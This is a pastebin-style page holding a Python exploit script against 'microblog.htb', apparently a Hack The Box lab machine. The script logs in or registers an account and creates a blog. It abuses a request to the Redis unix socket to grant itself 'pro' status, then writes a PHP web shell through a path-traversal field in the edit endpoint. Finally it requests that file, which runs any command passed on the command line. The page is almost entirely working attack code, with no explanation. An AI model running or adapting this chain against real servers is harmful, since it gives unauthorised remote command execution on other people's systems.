Untitled
unknown
plain_text
2 years ago
3.5 kB
3
Indexable
import requests import re import sys import os my_session = requests.Session() proxy = {"http": "http://127.0.0.1:8080"} user = "test" def get_cookies(force): if (requests.get("http://a.microblog.htb").status_code == 404 or force): print("Fckin page data was cleaned out, registering again") register_url = "http://app.microblog.htb:80/register/index.php" register_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/register/", "Upgrade-Insecure-Requests": "1"} register_data = {"first-name": user, "last-name": "asd", "username": user, "password": "asd"} my_session.post(register_url, headers=register_headers, data=register_data, proxies=proxy) else: login_url = "http://app.microblog.htb:80/login/index.php" login_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/login/", "Upgrade-Insecure-Requests": "1"} login_data = {"username": user, "password": "asd"} r = my_session.post(login_url, headers=login_headers, data=login_data, proxies=proxy) if "failed" in r.headers: get_cookies(True) def add_blog(): add_blog_url = "http://app.microblog.htb:80/dashboard/index.php" add_blog_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/dashboard/?message=Registration%20successful!&status=success", "Upgrade-Insecure-Requests": "1"} add_blog_data = {"new-blog-name": "a"} r = my_session.post( add_blog_url, headers=add_blog_headers, data=add_blog_data, proxies=proxy) def add_pro_feature(user): os.system( f"curl -X \"HSET\" 'http://microblog.htb/static/unix:/var/run/redis/redis.sock:{user}%20pro%20true%20a/b'") def upload_file(command): php_command = f'<?php shell_exec("{command}");?>' url = "http://a.microblog.htb:80/edit/index.php" post_data = {"id": "../uploads/test.php", "txt": php_command} r = my_session.post(url, data=post_data, proxies=proxy) def execute_file(): url = "http://a.microblog.htb:80/uploads/test.php" my_session.get(url, proxies=proxy) def execute_code(command): upload_file(command) execute_file() get_cookies(False) add_blog() add_pro_feature(user) execute_code(sys.argv[1])
Editor is loading...